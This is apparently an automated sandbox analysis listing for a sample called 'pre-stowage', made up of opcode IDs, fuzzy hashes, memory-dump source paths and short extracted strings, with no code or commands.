                                                                                                        • Opcode ID: f9ad8e5fc7904fba2df724e6b31c9fb4fd308a6042ae06fe9b9e91f145911557
                                                                                                        • Instruction ID: b11ef3c632be4d6859435b8766a5a636b72c2a5f6cfcb2868d79a56431240945
                                                                                                        • Opcode Fuzzy Hash: f9ad8e5fc7904fba2df724e6b31c9fb4fd308a6042ae06fe9b9e91f145911557
                                                                                                        • Instruction Fuzzy Hash: 21310A31B0432D4BDF28467588953BEA6A6ABC4309F28503ED907E7380DB76CE459361
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.3763527743.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_ef0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $q$$q
                                                                                                        • API String ID: 0-3126353813
                                                                                                        • Opcode ID: 04444a0faccb306ea5c37b76c49733b6fe13a4ab446ec668a973173aa3188270
                                                                                                        • Instruction ID: b81c9e870003dc62ce9dca99e4c59fab47f8442a97d4cf2c1f618509d409cc88
                                                                                                        • Opcode Fuzzy Hash: 04444a0faccb306ea5c37b76c49733b6fe13a4ab446ec668a973173aa3188270
                                                                                                        • Instruction Fuzzy Hash: D331053130424D8FDB358B29D99477E7B67FF84704B2515AAF142EB292DE29CC40C791
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.3763527743.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_ef0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'q$4'q
                                                                                                        • API String ID: 0-1467158625
                                                                                                        • Opcode ID: 6a14853daa989ae84024af7cb5795782a1cb71c580bf77e1831ea0983f9aa18f
                                                                                                        • Instruction ID: 77813885bcd4ab1966fe6b1fc5c9c7337e9b959ad7cb7bfa96a872e77734f725
                                                                                                        • Opcode Fuzzy Hash: 6a14853daa989ae84024af7cb5795782a1cb71c580bf77e1831ea0983f9aa18f
                                                                                                        • Instruction Fuzzy Hash: 40F0CD353002092FDB181AA6A85577BBBCBEFCC350B148029BA49C7341ED72CC0187D0
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.3763527743.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_ef0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: LRq
                                                                                                        • API String ID: 0-3187445251
                                                                                                        • Opcode ID: 671cc31b761b991d9a6f4f92e4719009d6261c73a71c86f33cd2934322e75cf0
                                                                                                        • Instruction ID: 9c452757606dce8f58f2392c1fb279b6abe07a1673d0a50acda67ca7fd8921c9
                                                                                                        • Opcode Fuzzy Hash: 671cc31b761b991d9a6f4f92e4719009d6261c73a71c86f33cd2934322e75cf0
                                                                                                        • Instruction Fuzzy Hash: AA520EB8944219CFCB64EF24ED85B9DBBB2FB88305F1045A9D449AB358DB306E85CF41
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.3763527743.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_ef0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: F
                                                                                                        • API String ID: 0-2701363647
                                                                                                        • Opcode ID: 37bea64abd9b90520a2c1fd03468fc8055d0acdb4dd4f75fcc8e7ec56543d9fa
                                                                                                        • Instruction ID: 23737d354dbdaccc015abd4e7df47642ffb1c55c8a36c11fff336e4be97b5190
                                                                                                        • Opcode Fuzzy Hash: 37bea64abd9b90520a2c1fd03468fc8055d0acdb4dd4f75fcc8e7ec56543d9fa
                                                                                                        • Instruction Fuzzy Hash: 4C315870D0824D8FCB05EFA9D8456EDBBF4AB4A300F10516ED644F72A4EB351945CBA1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.3763527743.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_ef0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 68cd5baf418541b43cef150adcadc76885413a1264035842f69fbe24ddd2d693
                                                                                                        • Instruction ID: 62424643387834e2aeacf1289d844f3f44caa8e681334bcf9893d339857a1f15
                                                                                                        • Opcode Fuzzy Hash: 68cd5baf418541b43cef150adcadc76885413a1264035842f69fbe24ddd2d693
                                                                                                        • Instruction Fuzzy Hash: 90129B360213478FD2607F24F6AE12A7A61FB4F7637066C18F18FC08699F7A14498B26
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.3763527743.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_ef0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b0733e6b1db1fc70be5ad87019c5a616c4a9bddaf192213fb5bef85fb6e8922a
                                                                                                        • Instruction ID: 061afe4f6bc57f43076a830529b6c41316263676e079a3d18349db96ca59bd8a
                                                                                                        • Opcode Fuzzy Hash: b0733e6b1db1fc70be5ad87019c5a616c4a9bddaf192213fb5bef85fb6e8922a
                                                                                                        • Instruction Fuzzy Hash: 4E715A343006098FDB24DF68C994ABE7BE6AF99304B1510A9EA05EB371DF75EC41CB50
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.3763527743.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_ef0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 386f9a2fae5209e6e41912f3ca5d7cc999a19c37839afdda5c0500d97e98c24c
                                                                                                        • Instruction ID: 2f731d07ecb616497958ce644c31fa7d12d79c7295d9a5237ce9eb0496395a88
                                                                                                        • Opcode Fuzzy Hash: 386f9a2fae5209e6e41912f3ca5d7cc999a19c37839afdda5c0500d97e98c24c
                                                                                                        • Instruction Fuzzy Hash: 61519374E01208DFDB44DFAAD9849DDBBF2BF89300F249169E809AB364DB309945CF50
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.3763527743.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_ef0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 34f5f35c4dc380055fcc1aa8c83fb2a7583639776dbb25c86a59d1c365356b99
                                                                                                        • Instruction ID: faf0d14e176208133e84d213407ab32c056aa0bab2f13680e08724ac3dab8660
                                                                                                        • Opcode Fuzzy Hash: 34f5f35c4dc380055fcc1aa8c83fb2a7583639776dbb25c86a59d1c365356b99
                                                                                                        • Instruction Fuzzy Hash: 495181B4E05308CFCB08DFA9D58499DBBF2BF89300B209469E805BB364DB35A842CF50
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.3763527743.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_ef0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 133705279407b1a9049c785b32968a0a08a353d9270d37bf60e97db9d88f249a
                                                                                                        • Instruction ID: 0b13294a2ce36a27c9a52136344ae2164fe648e0178790428f803547199571f7
                                                                                                        • Opcode Fuzzy Hash: 133705279407b1a9049c785b32968a0a08a353d9270d37bf60e97db9d88f249a
                                                                                                        • Instruction Fuzzy Hash: 7C41CE71A0024DDFCF11CFA4C844AADBFB2AF49314F088065EA59AF2A1D374E914CB62
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.3763527743.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_ef0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 5fb9fb756f476101840b0310b3ab0bcba2346463e6e2391c2ca64274cff011bd
                                                                                                        • Instruction ID: 859848a682b665e4d73c16ee79d9d82a966687b5eead398676dd731b0d7c1341
                                                                                                        • Opcode Fuzzy Hash: 5fb9fb756f476101840b0310b3ab0bcba2346463e6e2391c2ca64274cff011bd
                                                                                                        • Instruction Fuzzy Hash: BB4162307002498FDB10DF68C944BBA7BE6EB89318F648466EA48DB256D776DC41CB61
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.3763527743.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_ef0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 46d7d21231cf9034410eef66507f0cd5bf42b9a26ce6307650fbe417d252c0da
                                                                                                        • Instruction ID: c8ee6ef26eda3dc70d39bbb662e088affb96cbc8cbc618834f16cf4ae3b90549
                                                                                                        • Opcode Fuzzy Hash: 46d7d21231cf9034410eef66507f0cd5bf42b9a26ce6307650fbe417d252c0da
                                                                                                        • Instruction Fuzzy Hash: 9A31907130410DEFCF11AF64D845AAE3BB2FB58301F145029FA659B694CB39DE51DB90
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.3763527743.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_ef0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 8a00f2565b248e4e71e21075f265a6086ce829157feb75e84ed313ca9dfce7e8
                                                                                                        • Instruction ID: 0ee8d7a3e3c451c2551238179cace5387146f1127b44c5749be70da8415056cb
                                                                                                        • Opcode Fuzzy Hash: 8a00f2565b248e4e71e21075f265a6086ce829157feb75e84ed313ca9dfce7e8
                                                                                                        • Instruction Fuzzy Hash: 69317531B0021D8FEB249B64C855BAE77A7EF84700F20907DE507AB295DF39DE429B61
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.3763527743.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_ef0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 55efe5a2067fa90b28a4ae0ae2d8ef640d926d65ea9ded08bf720e412430df74
                                                                                                        • Instruction ID: 3629c18e13cd5857f09b65c658b349d8ca51724e47a26242c1fcdbeea82d827c
                                                                                                        • Opcode Fuzzy Hash: 55efe5a2067fa90b28a4ae0ae2d8ef640d926d65ea9ded08bf720e412430df74
                                                                                                        • Instruction Fuzzy Hash: 94216A3030020A4FDF241735895567E26A7AFC434CB14903ADA66DB399DE29CC42D781
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.3763527743.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_ef0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4e80928ca9d6d1b1025c0965ef1eaf328390af0d0f5d5e2543a11dac5a59771b
                                                                                                        • Instruction ID: 84daa525f85f992236124e18afc2cca7baa7a1868278cf1d3ccef222ad6d85d8
                                                                                                        • Opcode Fuzzy Hash: 4e80928ca9d6d1b1025c0965ef1eaf328390af0d0f5d5e2543a11dac5a59771b
                                                                                                        • Instruction Fuzzy Hash: BC21263030020A4BEF245A39C65477E7697AFC474CF249039EA66DB798DE7ACC42D785
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.3763527743.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_ef0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b3406973909811c4c14d1c94c3f1025ae485db33d4d0fab2b762f851d1796dfa
                                                                                                        • Instruction ID: 609d1c80aa1eaa3eab1123731e0f9a909b78681127de7e6a6f53247cb213aeb9
                                                                                                        • Opcode Fuzzy Hash: b3406973909811c4c14d1c94c3f1025ae485db33d4d0fab2b762f851d1796dfa
                                                                                                        • Instruction Fuzzy Hash: 0E21B272B001089FDB149F64D889AEDBBF6FB4C310F145069E91AAB690DB329C41CB51
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.3763285868.0000000000E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E2D000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_e2d000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 5a7b448ddeb95d638b9211cac4806cbecab83c29c0e644af6a17fc2b70d61018
                                                                                                        • Instruction ID: 9ff576f461c0d94c2818e02cc4b30605c27c9463416ef556131288808ecae6bf
                                                                                                        • Opcode Fuzzy Hash: 5a7b448ddeb95d638b9211cac4806cbecab83c29c0e644af6a17fc2b70d61018
                                                                                                        • Instruction Fuzzy Hash: 8D313C7150E3C09FC7038B24D994701BF71AF47214F19C5DBD9898F2A3C63A981ACB62
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.3763527743.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_ef0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 3a4710f53b8114391a3a50802b916c828a734e80f2f81829fbd0b3642aeacca0
                                                                                                        • Instruction ID: 716ed93cacbd36b39ecd4ef449301cfd4aead91da6ae3fcc49b2be5f21fa9d92
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.3763527743.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_ef0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: F$F$F$F
                                                                                                        • API String ID: 0-1453486905
                                                                                                        • Opcode ID: 96d7b2de4a93566bb0d464b926301b9f5bed516c71c7d052636b411dbc6d44b8
                                                                                                        • Instruction ID: 5ba701f1a1a4aef1cce0cb435a1c9efc3c24abf15831745996742de8e623fad7
                                                                                                        • Opcode Fuzzy Hash: 96d7b2de4a93566bb0d464b926301b9f5bed516c71c7d052636b411dbc6d44b8
                                                                                                        • Instruction Fuzzy Hash: DB4180B0E0121DDFD709EFB4C4516BE7BB2EF86300F6095A9A604BB395DB305A45CB91
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.3763527743.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_ef0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ;Br^$F$F$F
                                                                                                        • API String ID: 0-1406042771
                                                                                                        • Opcode ID: ae8992d7eb804276ba200a2c1169dcc831bccff34f72cb8444176d9655fc0f64
                                                                                                        • Instruction ID: a7a5e142c01f8555e6eadd1e927692f80860ae5900bcd9e712698c145b9f3fab
                                                                                                        • Opcode Fuzzy Hash: ae8992d7eb804276ba200a2c1169dcc831bccff34f72cb8444176d9655fc0f64
                                                                                                        • Instruction Fuzzy Hash: 7421E0B4E0021CAFD704EFB5C4116AE7BB2EF85304F1094AD9610BB385DB305A45CF81
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.3763527743.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_ef0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: F$F$F$[Br^
                                                                                                        • API String ID: 0-217853069
                                                                                                        • Opcode ID: a3b1fa64f030b18e90257aeb3b53820dbd31049792f5fe8741d8c64976fcedef
                                                                                                        • Instruction ID: f50590bccdccd5c3f582044b8d1bac7a96170ae39d6b66a1cb547c62edb28da3
                                                                                                        • Opcode Fuzzy Hash: a3b1fa64f030b18e90257aeb3b53820dbd31049792f5fe8741d8c64976fcedef
                                                                                                        • Instruction Fuzzy Hash: 2A21BDB4E0421C9BD704EFB9D4016AEBBB2EF85304F1094ADA614BB285DB385A45CF51
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.3763527743.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_ef0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: F$F$F$KBr^
                                                                                                        • API String ID: 0-1797435459
                                                                                                        • Opcode ID: d4430c7ab61a02be4aa536853878aa25351548b27dcf56341d9b3df9c01ca3dc
                                                                                                        • Instruction ID: cdffe77ce7a2405e094a915801e93ee3782d65d8e834980b6ffb751b43e8ded1
                                                                                                        • Opcode Fuzzy Hash: d4430c7ab61a02be4aa536853878aa25351548b27dcf56341d9b3df9c01ca3dc
                                                                                                        • Instruction Fuzzy Hash: C421EDB4E042089FD705EFB9C4116AEBBB2EF85304F1094A9A614BB385DB305A45CF51
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.3763527743.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_ef0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: +Br^$F$F$F
                                                                                                        • API String ID: 0-3182432131
                                                                                                        • Opcode ID: fc24c7121919b97bd7c19e638b9a280058227522a7e39fe4c38ec6a11c155b51
                                                                                                        • Instruction ID: 36cfcaf77b1d91f8ed6fd90697335810ecb4751b11e0257606a0203a19fa8fee
                                                                                                        • Opcode Fuzzy Hash: fc24c7121919b97bd7c19e638b9a280058227522a7e39fe4c38ec6a11c155b51
                                                                                                        • Instruction Fuzzy Hash: F721B0B4E002089FD704EFB9D4016AEBBB2EF85304F1090AD9614BB395DB345906CF51
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.3763527743.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_ef0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: \;q$\;q$\;q$\;q
                                                                                                        • API String ID: 0-2933265366
                                                                                                        • Opcode ID: 7e48ef68528f02377e1243e849bc50e53bdcad23719b78683142b2f5169e9e17
                                                                                                        • Instruction ID: c78c911fc5d4055ea963426742683b4c592e7b4a551c276a7bf778d56628a311
                                                                                                        • Opcode Fuzzy Hash: 7e48ef68528f02377e1243e849bc50e53bdcad23719b78683142b2f5169e9e17
                                                                                                        • Instruction Fuzzy Hash: 4B01A23170011D8FC7248A2DC540A3577E6FFCC7A8729A16AEA06EB370EAB2EC419750